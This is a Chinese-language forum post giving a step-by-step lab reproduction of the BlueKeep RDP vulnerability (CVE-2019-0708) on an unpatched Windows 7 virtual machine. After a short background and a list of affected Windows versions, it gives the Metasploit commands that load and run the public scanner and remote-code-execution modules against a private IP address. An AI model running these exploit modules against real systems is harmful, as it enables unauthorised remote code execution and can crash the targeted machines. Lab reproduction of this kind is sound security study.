找回密码
 register

QQ登录

只需一步,快速开始

查看: 2052|回复: 0

[每天自学] Metasploit之CVE-2019-0708远程执行代码漏洞利用过程

[复制链接]

[每天自学] Metasploit之CVE-2019-0708远程执行代码漏洞利用过程

[复制链接]
  • 打卡等级:热心大叔
  • 打卡总天数:122
  • 打卡月天数:18
  • 打卡总奖励:121
  • 最近打卡:2025-02-22 14:24:44
Waylee

主题

0

回帖

1万

积分

仙帝

积分
14008
Waylee 2021-4-3 20:44 | 显示全部楼层 |阅读模式

马上注册,查看网站隐藏内容!!

您需要 登录 才可以下载或查看,没有账号?register

×
0.漏洞背景
Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类蠕虫病毒,从而进行大规模传播和破坏。

1.影响范围
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
————————————————
2.复现操作2.0 提前准备好一个没有打补丁的win7系统(虚拟机和物理机都可以,推荐虚拟机,不要使用自己拿下的服务器,蓝屏后果无法预测)2.2 打开msf,并搜索0708

msfconsole
search 0708
2.3 使用扫描模块(scanner)
use  auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set rhost 192.168.237.131 //这里的ip填写自己win7主机的ip
run

2.4 进行利用
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show targets //选择目标主机类型  这里我选择了7601 -vmware 15
set target 4
set rhost 192.168.237.131
run



您需要登录后才可以回帖 登录 | register

本版积分规则

雪舞知识库 | 浙ICP备15015590号-1 | 萌ICP备20232229号|浙公网安备33048102000118号 |天天打卡

GMT+8, 2025-2-22 16:57 , Processed in 0.111954 second(s), 9 queries , Redis On.

Powered by XueWu Licensed

Copyright © Tencent Cloud.

快速回复 返回顶部 返回列表